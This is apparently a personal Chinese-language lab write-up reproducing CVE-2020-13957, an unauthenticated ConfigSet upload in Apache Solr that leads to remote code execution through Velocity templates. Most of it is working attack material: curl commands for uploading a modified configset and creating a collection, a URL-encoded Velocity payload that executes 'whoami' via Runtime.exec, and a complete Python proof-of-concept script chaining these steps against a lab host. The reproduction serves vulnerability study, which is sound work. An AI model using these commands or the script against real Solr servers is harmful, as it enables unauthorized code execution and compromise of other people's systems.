1、相关简介
1.1、漏洞概述
CVE-2020-13957,在特定的Solr版本中ConfigSet API存在未授权上传漏洞,攻击者利用该漏洞可实现远程代码执行。
1.2、漏洞利用链
上传configset——基于configset再次上传configset(跳过身份检测),利用新configset创造collection——利用solrVelocity模板进行RCE。
1.3、影响版本
Apache Solr 6.6.0 -6.6.5
Apache Solr 7.0.0 -7.7.3
Apache Solr 8.0.0 -8.6.2
2、漏洞复现
2.1、漏洞环境
solr下载地址:
http://archive.apache.org/dist/lucene/solr/
这次复现使用的是solr8.0.0版本
靶机:
win10,IP地址:192.168.94.130
攻击机:
kali
2.2、环境搭建
首先,在win10靶机中解压solr-8.0.0.zip,然后在cmd中切换到bin目录下执行以下命令:
solr.cmd start -c
如果是在Linux系统中搭建solr环境,执行的命令为:
./solr start -e cloud -force
然后在kali的浏览器中打开http://192.168.94.130:8983/,
solr以cloud模式启动,环境搭建成功.
2.3、漏洞复现
首先在kali中解压solr-8.0.0.zip,切换到server/solr/configsets/_default/conf/目录,找到solrconfig.xml文件,并将velocity.params.resource.loader.enabled的false修改为true,即:
name="params.resource.loader.enabled">${velocity.params.resource.loader.enabled:true}
然后在
server/solr/configsets/_default/conf/目录下打开终端,执行以下命令将conf目录下所有文件打包成一个压缩文件mytest.zip
zip -r - * > mytest.zip
由于ConfigSet API存在未授权上传,可以通过以下命令将mytest.zip上传
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @mytest.zip "http://192.168.94.130:8983/solr/admin/configs?action=UPLOAD&name=mytest"
根据CREATE得到的新configset创建恶意collection
curl "http://192.168.94.130:8983/solr/admin/collections?action=CREATE&name=mytest2&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest"
在kali的浏览器中输入以下地址,即可利用已上传的collection进行远程命令执行,这里执行的是whoami
http://192.168.94.130:8983/solr/mytest2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
whoami执行成功了,漏洞复现成功
3、编写验证POC
3.1、重新搭建环境
回到win10靶机执行以下的solr停止命令,然后将solr8.0整个文件夹删除
solr stop -p 8983
重复2.2的环境搭建过程,重新搭建漏洞环境,重新在win10中启动solr(这里试过如果不重新搭建漏洞环境,再次验证漏洞时会出错)
3.2、执行编写好的POC
先编写一个能验证漏洞存在的简单POC,如下:
#!/usr/bin/python3 #coding=utf-8 import requests def testPoc(url): try: urls = url + '/solr/admin/configs?action=UPLOAD&name=mytest' files = { 'file':('mytest.zip',open('mytest.zip','rb'),'application/octet-stream') } headers = { 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' } response = requests.post(url=urls,headers=headers,files=files) if response.status_code == 200: print('上传成功') else: print('上传出错') urls = url + '/solr/admin/collections?action=CREATE&name=mytest2&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest' response = requests.get(url=urls,headers=headers) if response.status_code == 200: #print(response.text) print('创建成功') else: print('创建失败') urls = url + '/solr/mytest2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end' response = requests.get(url=urls,headers=headers) if response.status_code == 200: print(response.text) print('----------------存在漏洞---------------') else: print('----------------不存在漏洞') except Exception as e: print(e) url = 'http://192.168.94.130:8983' testPoc(url) print('程序执行结束')
将编写好的poc.py文件放到kali的mytest.zip文件所在目录下
在当前目录打开终端,执行编写好的python脚本验证漏洞即可:
4、总结
本次漏洞复现中遇到不少问题,比如其他大佬的漏洞复现文章中,有一个根据UPLOAD的配置,创建一个新的配置的命令,这里并没有执行也复现成功了。然后每次验证过漏洞存在时,都需要重新搭建环境等等。。菜鸟继续加油哇~
